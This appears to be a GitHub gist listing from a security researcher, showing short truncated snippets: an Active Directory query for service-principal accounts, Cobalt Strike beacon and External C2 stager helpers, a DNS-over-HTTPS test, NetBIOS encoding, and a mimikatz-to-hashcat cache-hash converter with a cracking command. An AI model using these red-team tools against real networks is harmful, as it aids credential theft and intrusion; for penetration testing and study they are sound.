dtmsecurity / SPNs.qds
Created Aug 14, 2020
Find user accounts with servicePrincipalName attribute set in native QDS file
[CommonQuery]
Handler=5EE6238AC231D011891C00A024AB2DBBC1
Form=E33FEE83D957D011B93200A024AB2DBBE6
[DsQuery]
ViewMode=0413000017
EnableFilter=0000000000
[Microsoft.PropertyWell]
Items=0000000000
QueryStringLength=4500000045
QueryStringValue=2800260028006F0062006A0065006300740043006C006100730073003D007500730065007200290028006F0062006A00650063007400430061007400650067006F00720079003D0070006500720073006F006E0029002900280073006500720076006900630065005000720069006E0063006900700061006C004E0061006D0065003D002A0029000000D7
dtmsecurity / goldfermi.py
Created Jul 27, 2020
Integrate URLs scraped from liked tweets and Notion using the unofficial API
import urllib
from bs4 import BeautifulSoup
import tweepy
from urlextract import URLExtract
from notion.client import NotionClient
from notion.block import TodoBlock, BookmarkBlock
import os
from unshortenit import UnshortenIt
dtmsecurity / sharpgen.cna
Created Nov 8, 2018
SharpGen Aggressor Beacon Wrapper
# Build-host settings for the wrapper. All three values are absolute paths
# hard-coded for the author's machine and have to be adjusted per install.
# $temppath points at the shared /tmp/ directory; the alias below derives its
# .cs and .exe file names from it plus a small random number, so on a
# multi-user host a private per-user directory is the safer choice.
$temppath = "/tmp/";
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";

# Register the "sharpgen" console command together with its help text.
beacon_command_register("sharpgen", "Compile and execute C-Sharp", "Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
dtmsecurity / getStager.py
Created Nov 8, 2018
Simple test script to get a stager from Cobalt Strike External C2
import socket
import struct
def recv_frame(sock):
try:
chunk = sock.recv(4)
except:
return("")
if len(chunk) < 4:
return()
dtmsecurity / doh_test.sh
Last active Oct 19, 2020
DNS over HTTPS (DoH) Resolver GET Test Script
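#!/bin/bash
# Query several public DNS-over-HTTPS resolvers for the AAAA record of
# example.com through their JSON GET interface and print each raw response
# between START/END markers.
#
# TLS certificate verification is left at curl's default (enabled). The
# earlier `curl -k` accepted any certificate, so a response could come from
# an on-path proxy or a spoofed endpoint and still look like a successful
# DoH lookup. A certificate error here is a finding worth investigating
# (for example TLS interception on the network), not something to suppress.

# doh_query LABEL URL
#   LABEL  text printed in the START/END markers
#   URL    full resolver URL including the query string
doh_query() {
    printf "===START %s===\n" "$1"
    curl -H "accept: application/dns-json" "$2"
    printf "\n===END %s===\n" "$1"
}

doh_query "dns.google.com" "https://dns.google.com/resolve?name=example.com&type=AAAA"
doh_query "cloudflare-dns.com" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
doh_query "1.1.1.1" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"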
View netbios_encode.py
# Implemented the reverse of the compact answer on:
# https://stackoverflow.com/questions/1965065/encode-netbios-name-python/1965140
def netbios_encode(input_string):
    """Return the half-ASCII (NetBIOS first-level) encoding of *input_string*.

    Every character is split into its high and low 4-bit halves, and each
    half is written as the letter that many places after 'A', so one input
    character becomes two output letters.

    No padding or length check is applied. Characters with a code point
    above 0xFF yield letters outside the 'A'..'P' range, because the high
    half is not masked.
    """
    base = ord('A')
    encoded = []
    for ch in input_string:
        code = ord(ch)
        encoded.append(chr((code >> 4) + base))   # high nibble
        encoded.append(chr((code & 0xF) + base))  # low nibble
    return ''.join(encoded)
def netbios_decode(netbios):
i = iter(netbios.upper())
try:
return ''.join([chr(((ord(c)-ord('A'))<<4)+((ord(next(i))-ord('A'))&0xF)) for c in i])
dtmsecurity / mscache.py
Created Oct 24, 2017
Needed a dirty way to convert mimikatz output for mscache to hashcat
import sys
import re
# .\hashcat64.exe -m 2100 .\inhash.txt .\rockyou.txt
if len(sys.argv[1]) > 0:
fh = open(str(sys.argv[1]),"r")
lines = fh.readlines()
fh.close()